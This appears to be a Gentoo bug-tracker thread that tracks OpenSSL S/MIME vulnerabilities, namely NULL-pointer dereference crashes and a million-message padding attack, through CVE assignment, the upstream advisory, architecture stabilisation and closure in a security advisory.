A vulnerability has been reported in OpenSSL, which can be exploited by malicious people to cause a DoS (Denial of Service) of the application using the library.
The vulnerability is caused due to a NULL-pointer dereference error in the "mime_hdr_cmp()" function (crypto/asn1/asn_mime.c) when parsing certain MIME headers and can be exploited to cause a crash.
The vulnerability is reported in versions 0.9.7i, 0.9.8t, and 1.0.0g. Other versions may also be affected.
Fixed in the CVS repository.
Provided and/or discovered by
Reported by Mats Nilsson to the openssl-dev mailing list.
Sorry guys, this is not my fault.
> Ok did some more research and here's what we got:
> First mention of this bug is in 2006:
> So please use CVE-2006-7248 for this issue.
Due to the Novell/kadu miss-paste this CVE needs to be re-issued. Please
use CVE-2006-7250 for this OpenSSL issue.
The mime_hdr_cmp function in crypto/asn1/asn_mime.c in OpenSSL 0.9.8t and
earlier allows remote attackers to cause a denial of service (NULL pointer
dereference and application crash) via a crafted S/MIME message.
openssl 1.0.0h and 0.9.8u now in the tree which should fix this
Looks like this is relevant too:
OpenSSL Security Advisory [12 Mar 2012]
CMS and S/MIME Bleichenbacher attack (CVE-2012-0884)
A weakness in the OpenSSL CMS and PKCS #7 code can be exploited
using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding
also known as the million message attack (MMA).
Only users of CMS, PKCS #7, or S/MIME decryption operations are affected. A
successful attack needs on average 2^20 messages. In practice only automated
systems will be affected as humans will not be willing to process this many
SSL/TLS applications are *NOT* affected by this problem since the
SSL/TLS code does not use the PKCS#7 or CMS decryption code.
Thanks to Ivan Nestlerode <firstname.lastname@example.org> for discovering
The fix was developed by Stephen Henson of the OpenSSL core team.
Affected users should upgrade to OpenSSL 1.0.0h or 0.9.8u.
URL for this Security Advisory:
Arches, please test and mark stable:
Target keywords : "alpha amd64 arm hppa ia64 m68k ppc ppc64 s390 sh sparc x86"
Target keywords : "amd64 x86"
Stable for HPPA.
ppc and ppc64 done
Added to existing GLSA request.
The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before
0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of
service (NULL pointer dereference and application crash) via a crafted
S/MIME message, a different vulnerability than CVE-2006-7250.
The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in
OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict
certain oracle behavior, which makes it easier for context-dependent
attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen
This issue was resolved and addressed in
GLSA 201312-03 at http://security.gentoo.org/glsa/glsa-201312-03.xml
by GLSA coordinator Chris Reffett (creffett).